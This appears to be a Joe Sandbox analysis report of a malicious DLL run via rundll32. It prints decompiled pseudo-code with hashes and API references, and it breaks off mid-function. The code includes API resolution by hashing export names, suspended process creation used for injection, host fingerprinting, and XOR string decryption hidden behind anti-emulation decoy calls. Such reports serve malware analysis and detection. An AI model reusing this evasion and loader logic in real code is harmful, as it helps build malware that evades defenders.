Instruction ID: 85762fa87bf84ebb9b60b5ed767da253e99bba6ab009e757f312c963c4a3c12a
Opcode Fuzzy Hash: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
Instruction Fuzzy Hash: DC413F75E00719BFEB40CFA4CD81AAE77F9FB48345F200169F604E7695E770AA418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000A771 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 149
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A771(WCHAR* __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v29;
				intOrPtr _v40;
				short _v44;
				void* __ebx;
				signed int _t48;
				signed int _t59;
				intOrPtr _t62;
				signed int _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				char _t82;
				char _t96;
				signed int _t98;
				char _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				void* _t104;
				void* _t105;

				_t97 = __edx;
				_t82 = 0;
				_v24 = __edx;
				_v20 = 0;
				_v8 = 0;
				_t48 = E1000CF09("endless");
				_t98 = _t48;
				_v29 = 0;
				_t100 = 0xf;
				if(_t98 <= _t100) {
					__eflags = _t98;
					if(_t98 == 0) {
						goto L5;
					}
					goto L3;
				} else {
					_t98 = _t100;
					L3:
					_t96 = _t82;
					do {
						_t5 = _t96 + 0x41; // 0x41
						 *((char*)(_t104 + _t96 - 0x28)) = _t5;
						_t96 = _t96 + 1;
					} while (_t96 < _t98);
					L5:
					lstrlenW( &_v44);
					_t99 = E1000A650( &_v20);
					_v28 = _t99;
					if(_t99 != 0) {
						E1000A41E();
						_t101 = _v20;
						_v16 = _t82;
						__eflags = _t101;
						if(_t101 == 0) {
							L26:
							E1000A455();
							__eflags = _t101;
							if(_t101 == 0) {
								L28:
								E10009203( &_v28, _t82);
								return _v8;
							} else {
								goto L27;
							}
							do {
								L27:
								E10009203(_t99, 0xfffffffe);
								_t99 = _t99 + 4;
								_t101 = _t101 - 1;
								__eflags = _t101;
							} while (_t101 != 0);
							goto L28;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = _v8 - _t82;
							if(_v8 != _t82) {
								goto L26;
							}
							_t102 = _v8;
							_v12 = 1;
							do {
								__eflags = _t102;
								if(_t102 != 0) {
									break;
								}
								E1000936A( &_v44, _t82, 0x10);
								_t62 =  *0x10020fd8; // 0x474fc50
								_t105 = _t105 + 0xc;
								__eflags =  *(_t62 + 0x1898) & 0x00000200;
								if(__eflags != 0) {
									E1000E23E(_t82, _t97, __eflags);
								}
								_t97 =  &_v44;
								_t64 = E1000CB78( *((intOrPtr*)(_t99 + _v16 * 4)),  &_v44); // executed
								__eflags = _t64;
								if(_t64 >= 0) {
									_t97 =  &_v44;
									_t73 = E1000A93E(0x100013b8,  &_v44, _v24, _v12); // executed
									__eflags = _t73;
									if(__eflags != 0) {
										_t74 = E1000AA38( &_v44, __eflags); // executed
										__eflags = _t74;
										if(_t74 != 0) {
											_t102 = 1;
											__eflags = 1;
										}
									}
								}
								__eflags = _v44 - _t82;
								if(_v44 != _t82) {
									__eflags = _t102;
									if(_t102 == 0) {
										_t71 =  *0x10020fa0; // 0x474f8a0
										 *((intOrPtr*)(_t71 + 0x114))(_v44, _t82);
									}
									_t67 =  *0x10020fa0; // 0x474f8a0
									 *((intOrPtr*)(_t67 + 0x34))(_v40);
									_t69 =  *0x10020fa0; // 0x474f8a0
									 *((intOrPtr*)(_t69 + 0x34))(_v44);
								}
								_t66 = _v12 + 1;
								_v12 = _t66;
								__eflags = _t66 - 2;
							} while (_t66 <= 2);
							_t59 = _v16 + 1;
							_v8 = _t102;
							_t101 = _v20;
							_v16 = _t59;
							__eflags = _t59 - _t101;
							if(_t59 < _t101) {
								continue;
							}
							goto L26;
						}
						goto L26;
					}
					_t76 = E1000CF09("appear");
					_v29 = _t82;
					if(_t76 > _t100) {
						do {
							L8:
							_t12 = _t82 + 0x41; // 0x41
							 *((char*)(_t104 + _t82 - 0x28)) = _t12;
							_t82 = _t82 + 1;
						} while (_t82 < _t100);
						L9:
						lstrlenW( &_v44);
						return 0;
					}
					_t100 = _t76;
					if(_t100 == 0) {
						goto L9;
					}
					goto L8;
				}
			}

0x1000a771
0x1000a77a
0x1000a77c
0x1000a784
0x1000a787
0x1000a78a
0x1000a792
0x1000a794
0x1000a797
0x1000a79a
0x1000a7a0
0x1000a7a2
0x00000000
0x00000000
0x00000000
0x1000a79c
0x1000a79c
0x1000a7a4
0x1000a7a4
0x1000a7a6
0x1000a7a6
0x1000a7a9
0x1000a7ad
0x1000a7ae
0x1000a7b2
0x1000a7b6
0x1000a7c4
0x1000a7c6
0x1000a7cb
0x1000a802
0x1000a807
0x1000a80a
0x1000a80d
0x1000a80f
0x1000a8e7
0x1000a8e7
0x1000a8ec
0x1000a8ee
0x1000a902
0x1000a907
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a8f0
0x1000a8f0
0x1000a8f3
0x1000a8f9
0x1000a8fd
0x1000a8fd
0x1000a8fd
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a815
0x1000a815
0x1000a815
0x1000a818
0x00000000
0x00000000
0x1000a81e
0x1000a821
0x1000a828
0x1000a828
0x1000a82a
0x00000000
0x00000000
0x1000a837
0x1000a83c
0x1000a841
0x1000a844
0x1000a84e
0x1000a855
0x1000a855
0x1000a85d
0x1000a863
0x1000a868
0x1000a86a
0x1000a86f
0x1000a87a
0x1000a881
0x1000a883
0x1000a888
0x1000a88d
0x1000a88f
0x1000a893
0x1000a893
0x1000a893
0x1000a88f
0x1000a883
0x1000a894
0x1000a897
0x1000a899
0x1000a89b
0x1000a89d
0x1000a8a6
0x1000a8a6
0x1000a8ac
0x1000a8b4
0x1000a8b7
0x1000a8bf
0x1000a8bf
0x1000a8c5
0x1000a8c6
0x1000a8c9
0x1000a8c9
0x1000a8d5
0x1000a8d6
0x1000a8d9
0x1000a8dc
0x1000a8df
0x1000a8e1
0x00000000
0x00000000
0x00000000
0x1000a8e1
0x00000000
0x1000a815
0x1000a7d2
0x1000a7d7
0x1000a7dd
0x1000a7e5
0x1000a7e5
0x1000a7e5
0x1000a7e8
0x1000a7ec
0x1000a7ed
0x1000a7f1
0x1000a7f5
0x00000000
0x1000a7fb
0x1000a7df
0x1000a7e3
0x00000000
0x00000000
0x00000000
0x1000a7e3

APIs

lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7B6
lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7F5

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

Strings

appear, xrefs: 1000A7CD
endless, xrefs: 1000A77F

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen$memset
String ID: appear$endless
API String ID: 3887242890-2536025861
Opcode ID: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
Instruction ID: 43acfddb437bd695ff901fa8aaf7fd7f1202ceeadee2dfa3d6f986462457d3c2
Opcode Fuzzy Hash: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
Instruction Fuzzy Hash: 2751A335D002199FEF01DBA4C9859ED77F5EF497D0F254269E900B7249DB309D82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100093B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100093B8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000E6E9( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000CF09( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x100093c1
0x100093c3
0x100093c6
0x100093c9
0x100093cf
0x1000942c
0x00000000
0x1000942c
0x100093d1
0x100093dc
0x100093df
0x100093e4
0x100093e9
0x100093ec
0x100093ee
0x100093f1
0x100093f4
0x100093f9
0x00000000
0x00000000
0x00000000
0x00000000
0x100093fb
0x100093fb
0x1000940d
0x1000941a
0x1000941e
0x00000000
0x00000000
0x10009420
0x10009423
0x10009424
0x1000942a
0x00000000
0x00000000
0x00000000
0x1000942a
0x10009441
0x10009446
0x1000944a
0x00000000
0x10009456
0x10009456
0x10009458
0x10009458
0x1000945e
0x00000000
0x00000000
0x10009464
0x10009468
0x1000946c
0x00000000
0x00000000
0x00000000
0x1000946c
0x10009472
0x1000947a
0x1000947f
0x10009482
0x10009482
0x10009484
0x10009488
0x10009490
0x00000000
0x00000000
0x10009494
0x1000949c
0x00000000
0x00000000
0x00000000
0x1000949c

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 10009488
GetProcAddress.KERNEL32(00000000,?), ref: 10009494

Strings

.dll, xrefs: 10009484, 10009487

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
Instruction ID: 5f7767ba692d8623afc008dab85022027fb0ad9a9831507a7d1254af1b27c92f
Opcode Fuzzy Hash: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
Instruction Fuzzy Hash: 6631F175A002158BEF54CFA9D880AAEBBF5FF45384F2444A9D845E734AD730ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D131 Relevance: 4.6, APIs: 3, Instructions: 82
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000D131(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				char _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t26;
				signed int _t28;
				void* _t32;
				long _t37;
				WCHAR* _t42;
				WCHAR* _t57;
				void* _t60;

				_v8 = _v8 & 0x00000000;
				_t42 = __edx;
				_t57 = __ecx;
				E1000936A(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x10020fa0; // 0x474f8a0
				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
				E1000C229(__edx,  &_v528, 0x100);
				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
				_t26 = E100091B2(__edx,  &_v528);
				_v16 = _t26;
				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t28;
				E10009E2E( &_v16);
				_t32 = E1000CF22(_t42);
				E1000C172( &(_t42[E1000CF22(_t42)]), 0x100 - _t32, L"%u", _v8);
				lstrcatW(_t42, _t57);
				_t37 = E1000CF22(_t42);
				_v12 = _t37;
				CharUpperBuffW(_t42, _t37);
				return E1000E6E9(_t42, E1000CF22(_t42) + _t39, 0);
			}

0x1000d13a
0x1000d146
0x1000d14c
0x1000d14e
0x1000d156
0x1000d164
0x1000d169
0x1000d178
0x1000d17d
0x1000d184
0x1000d191
0x1000d1ab
0x1000d1b0
0x1000d1b2
0x1000d1b9
0x1000d1c9
0x1000d1da
0x1000d1e4
0x1000d1ec
0x1000d1f3
0x1000d1f6
0x1000d213

APIs

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D1AB

Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F

lstrcatW.KERNEL32(?,00000114), ref: 1000D1E4
CharUpperBuffW.USER32(?,00000000), ref: 1000D1F6

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatmemset
String ID:
API String ID: 3467380347-0
Opcode ID: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
Instruction ID: e401c8bce79da03c818e680b56469f360460cf51717d93477c68a4169e5f006f
Opcode Fuzzy Hash: dccfd8cb8e22ed0210f33860bbd810d879a5a769ac73bc817993e2aa5ca97174
Instruction Fuzzy Hash: 3E2192B6A00218BFE710DBA4DC8AFEE77BDEB44350F104579F505D7186EA74AE448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000DC93 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000DC93(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E100091E7(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E10009203( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000dc96
0x1000dc97
0x1000dc9e
0x1000dca6
0x1000dcaa
0x1000dcb3
0x1000dcf9
0x1000dcf9
0x1000dcc0
0x1000dcc8
0x1000dcca
0x1000dcd0
0x1000dce9
0x00000000
0x1000dceb
0x1000dcf0
0x00000000
0x1000dcf6
0x1000dcd2
0x1000dcd2
0x1000dcd2
0x1000dcd2
0x1000dcd0
0x1000dcff

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5
GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCE4

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
Instruction ID: 9a7a69b10fe3764d9cd2296672b65be2c5230f9efb3b633d2ad7adf520ad261b
Opcode Fuzzy Hash: b2dc6801a2c542b43811d510dcddeb5285962dfb57cdae12c43fd21f7238ed39
Instruction Fuzzy Hash: A6017C7660022ABFBB20EBA5DD89DCF7FAEEB456E17210426F905D2111EA71DD40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 10009D63 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10009D63(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				int _t19;
				struct _numberfmt* _t29;
				signed int _t33;
				signed int _t34;
				struct _numberfmt* _t36;
				void* _t38;
				void* _t41;
				struct _numberfmt* _t44;
				signed int _t45;

				_t41 = __edx;
				_t45 = _a12;
				_t44 = 0;
				_v8 = __ecx;
				_t33 = 0;
				if(_t45 >= __edx) {
					L5:
					_t19 = GetNumberFormatA(0x7d3, 0xb4, "electricmadness", _t44,  &_v88, 0x22); // executed
					if(_t19 != 0) {
						_t36 = _t44;
						do {
							_t36 = _t36 + 1;
						} while (_t36 < 0x22);
						L11:
						_t38 = E100091E7(2 + _t33 * 2);
						if(_t38 != 0) {
							if(_t33 == 0) {
								L15:
								return _t38;
							} else {
								goto L14;
							}
							do {
								L14:
								 *((short*)(_t38 + _t44 * 2)) = ( *((_t45 & 0x0000007f) + _a4) ^  *(_t45 + _v8)) & 0x000000ff;
								_t44 = _t44 + 1;
								_t45 = _t45 + 1;
							} while (_t44 < _t33);
							goto L15;
						}
						return 0x100210ac;
					}
					_t29 = _t44;
					do {
						_t29 = _t29 + 1;
					} while (_t29 < 0x14);
					goto L11;
				}
				while( *((_t45 & 0x0000007f) + _a4) !=  *(_t45 + _v8)) {
					_t45 = _t45 + 1;
					if(_t45 < _t41) {
						continue;
					}
					_t45 = _a12;
					goto L5;
				}
				_t34 = _t45;
				_t45 = _a12;
				_t33 = _t34 - _t45;
				goto L5;
			}

0x10009d63
0x10009d6b
0x10009d6f
0x10009d71
0x10009d74
0x10009d78
0x10009d9e
0x10009db4
0x10009dbc
0x10009dc8
0x10009dca
0x10009dca
0x10009dcb
0x10009dd0
0x10009dde
0x10009de2
0x10009ded
0x10009e0d
0x00000000
0x00000000
0x00000000
0x00000000
0x10009def
0x10009def
0x10009e03
0x10009e07
0x10009e08
0x10009e09
0x00000000
0x10009def
0x00000000
0x10009de4
0x10009dbe
0x10009dc0
0x10009dc0
0x10009dc1
0x00000000
0x10009dc6
0x10009d7a
0x10009d8d
0x10009d90
0x00000000
0x00000000
0x10009d92
0x00000000
0x10009d92
0x10009d97
0x10009d99
0x10009d9c
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 10009DB4

Strings

electricmadness, xrefs: 10009DA5

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: electricmadness
API String ID: 481257995-1127315026
Opcode ID: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
Instruction ID: aab1a026c2f2c5a5b26f8d8130129cea483a76aafec3bdca2fedd0ee807baeb0
Opcode Fuzzy Hash: 474225535248c1eba899f2fb2680a2b2a95483c582a0e8dd64a7220fedecc991
Instruction Fuzzy Hash: 92117F327043955BEB10EF98CC856AE37A5DF852D0B51406AFD92DB259D670EC42C390

Uniqueness

Uniqueness Score: -1.00%

Function 10009CBF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10009CBF(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				char _v88;
				signed int _t21;
				struct _numberfmt* _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				signed int _t37;
				signed int _t38;
				void* _t39;

				_t34 = __edx;
				_t29 = __ecx;
				_t37 = _a12;
				_t38 = _t37;
				_v8 = __ecx;
				if(_t37 >= __edx) {
					L4:
					_t27 = 0;
					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
						do {
							_t27 = _t27 + 1;
						} while (_t27 < 0x22);
						L14:
						_t30 = 0x1002107e;
						L15:
						return _t30;
					} else {
						goto L5;
					}
					do {
						L5:
						_t27 = _t27 + 1;
					} while (_t27 < 0x14);
					goto L14;
				}
				_t28 = _a4;
				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
					_t38 = _t38 + 1;
					if(_t38 < _t34) {
						continue;
					}
					goto L4;
				}
				_t39 = _t38 - _t37;
				if(_t39 == 0) {
					goto L4;
				}
				_t21 = E100091E7(_t39 + 1); // executed
				_t32 = _t21;
				_a12 = _t32;
				if(_t32 != 0) {
					_t33 = _v8;
					_t36 = _t32 - _t37;
					do {
						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
						_t37 = _t37 + 1;
						_t39 = _t39 - 1;
					} while (_t39 != 0);
					_t30 = _a12;
					goto L15;
				}
				return 0x1002107e;
			}

0x10009cbf
0x10009cbf
0x10009cc8
0x10009ccb
0x10009ccd
0x10009cd2
0x10009ce9
0x10009cee
0x10009d09
0x10009d51
0x10009d51
0x10009d52
0x10009d57
0x10009d57
0x10009d5c
0x00000000
0x00000000
0x00000000
0x00000000
0x10009d0b
0x10009d0b
0x10009d0b
0x10009d0c
0x00000000
0x10009d11
0x10009cd4
0x10009cd7
0x10009ce4
0x10009ce7
0x00000000
0x00000000
0x00000000
0x10009ce7
0x10009d13
0x10009d15
0x00000000
0x00000000
0x10009d1b
0x10009d21
0x10009d23
0x10009d28
0x10009d33
0x10009d36
0x10009d38
0x10009d43
0x10009d46
0x10009d47
0x10009d47
0x10009d4c
0x00000000
0x10009d4c
0x00000000

APIs

GetNumberFormatA.KERNEL32 ref: 10009D01

Strings

chickenfried, xrefs: 10009CF2

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: FormatNumber
String ID: chickenfried
API String ID: 481257995-586419266
Opcode ID: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
Instruction ID: c59e46062cbfb6ba45e4af24f1aa4b5ee3d0c5177bb5fc11745f9e327f620478
Opcode Fuzzy Hash: 7b62fe72fc9e894a0981e184735d60e8b91222583dd436eba39048155e1f2965
Instruction Fuzzy Hash: 5D117D35B083955FFB10CE6C8884A9E77AADB851C0B62406BF9929B25AD530DC018350

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB78 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E1000CB78(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E1000936A(__edx, 0, 0x10);
				E1000936A( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000cb89
0x1000cb96
0x1000cb9e
0x1000cbba
0x1000cbc0
0x1000cbc7

APIs

Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000CBBA

Strings

D, xrefs: 1000CB9E

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
Instruction ID: 07932fc84ff427775a204e18f3fe0ba77352146c5b198283cf31ed6b76e6a132
Opcode Fuzzy Hash: 34803733cb6db3f162df24bd21a5bbeea5bb7e3b92db20e3214360199722d846
Instruction Fuzzy Hash: A4F065F16406187FF720DA65CC0AFBF36ACDB85750F504125BB09EB1C1E5A0BE0586B5

Uniqueness

Uniqueness Score: -1.00%

Function 10001494 Relevance: 3.1, APIs: 2, Instructions: 108
sleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10001494(void* __edi, void* __fp0) {
				char _v8;
				void* __ecx;
				char _t19;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t37;
